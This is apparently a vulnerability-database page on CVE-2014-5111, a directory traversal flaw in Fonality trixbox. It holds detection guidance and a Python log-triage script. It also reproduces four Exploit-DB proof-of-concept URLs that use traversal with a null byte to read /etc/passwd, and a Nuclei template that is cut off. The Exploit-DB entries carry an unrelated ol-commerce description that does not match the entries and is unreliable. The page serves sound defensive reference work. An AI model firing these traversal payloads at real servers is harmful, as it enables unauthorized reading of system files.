CVE-2014-5111
Published: 2014-07-28
Priority: P3 41 · medium · 5 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:N/A:N
EXPLOIT
EPSS: 21.24% (97.3th percentile)
Multiple directory traversal vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/.
Detection & IOCs
- Detect LFI exploitation attempts by monitoring HTTP GET requests to trixbox maint module PHP files containing directory traversal sequences (../../../../) in the 'lang' parameter, particularly targeting /etc/passwd with a null byte (%00) terminator.
- Successful exploitation produces a response body containing Unix /etc/passwd content; match the response body against the pattern 'root:.*:0:0:' to confirm the file read.
- The null byte (%00) appended to the traversal payload truncates the file extension that the application appends; monitor for URL-encoded null bytes in query string parameters on these endpoints.
- The null byte truncation technique (%00) depends on the PHP installation still accepting null bytes in file paths; it is only effective on PHP versions prior to 5.3.4, where null byte poisoning in file paths was fixed.
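The checks listed above, sketched as log-triage code. This is an added example, not a rule from the page's sources or from the trixbox project; it assumes Apache combined-format access logs, and the function names and sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# The four endpoints named in the CVE description, under maint/modules/.
ENDPOINTS = ("home/index.php", "asterisk_info/asterisk_info.php",
             "repo/repo.php", "endpointcfg/endpointcfg.php")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
PASSWD_RE = re.compile(r"root:.*:0:0:")  # response pattern quoted on the page

# Constructed sample lines (combined log format, documentation IP addresses).
SAMPLE_LOG = (
    '192.0.2.10 - - [01/Aug/2014:10:00:00 +0000] "GET /maint/modules/repo/repo.php'
    '?lang=../../../../etc/passwd%00 HTTP/1.1" 200 1843',
    '192.0.2.11 - - [01/Aug/2014:10:00:05 +0000] "GET /maint/modules/home/index.php'
    '?lang=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1843',
    '192.0.2.12 - - [01/Aug/2014:10:00:09 +0000] "GET /maint/modules/home/index.php'
    '?lang=english HTTP/1.1" 200 5120',
)

def fully_decode(value, rounds=3):
    """Normalise layered percent-encoding a bounded number of times before matching."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_request(log_line):
    """Return the set of findings for one access-log line (empty = not flagged)."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return set()
    url = urlsplit(m.group(1))
    path = fully_decode(url.path).lower()
    if not any(path.endswith("/maint/modules/" + e) for e in ENDPOINTS):
        return set()
    findings = set()
    # parse_qs decodes one layer; fully_decode removes any that remain.
    for raw in parse_qs(url.query, keep_blank_values=True).get("lang", []):
        lang = fully_decode(raw).replace("\\", "/")
        if ".." in lang.split("/"):
            findings.add("traversal")
        if "\x00" in lang:
            findings.add("null-byte")
    return findings

def response_confirms_read(body):
    return bool(PASSWD_RE.search(body))
```

A request flagged by `classify_request` is only an attempt; pair it with `response_confirms_read` on the captured response body, where available, to separate attempts from confirmed file reads.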
No detection rules found.
Exploit-DB
Fonality trixbox - 'endpointcfg.php' Directory Traversal
exploitdb·2014-07-17
CVE-2014-5111 Fonality trixbox - 'endpointcfg.php' Directory Traversal
---
source: https://www.securityfocus.com/bid/68719/info
ol-commerce is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ol-commerce 2.1.1 is vulnerable; other versions may also be affected.
http://www.example.com/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00
Exploit-DB
Fonality trixbox - 'repo.php' Directory Traversal
exploitdb·2014-07-17
CVE-2014-5111 Fonality trixbox - 'repo.php' Directory Traversal
---
source: https://www.securityfocus.com/bid/68719/info
ol-commerce is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ol-commerce 2.1.1 is vulnerable; other versions may also be affected.
http://www.example.com/maint/modules/repo/repo.php?lang=../../../../../../../../etc/passwd%00
Exploit-DB
Fonality trixbox - 'asterisk_info.php' Directory Traversal
exploitdb·2014-07-17
CVE-2014-5111 Fonality trixbox - 'asterisk_info.php' Directory Traversal
---
source: https://www.securityfocus.com/bid/68719/info
ol-commerce is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ol-commerce 2.1.1 is vulnerable; other versions may also be affected.
http://www.example.com/maint/modules/asterisk_info/asterisk_info.php?lang=../../../../../../../../etc/passwd%00
Exploit-DB
Fonality trixbox - 'index.php' Directory Traversal
exploitdb·2014-07-17
CVE-2014-5111 Fonality trixbox - 'index.php' Directory Traversal
---
source: https://www.securityfocus.com/bid/68719/info
ol-commerce is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ol-commerce 2.1.1 is vulnerable; other versions may also be affected.
http://www.example.com/maint/modules/home/index.php?lang=../../../../../../../../etc/passwd%00
Nuclei
Fonality trixbox - Local File Inclusion
nuclei·CVSS 5.0
CVE-2014-5111 [MEDIUM] Fonality trixbox - Local File Inclusion
Multiple local file inclusion vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/.
Template:
id: CVE-2014-5111
info:
  name: Fonality trixbox - Local File Inclusion
  author: daffainfo
  severity: medium
  description: Multiple local file inclusion vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/.
  impact: |
    An attacker can exploit this vulnerability t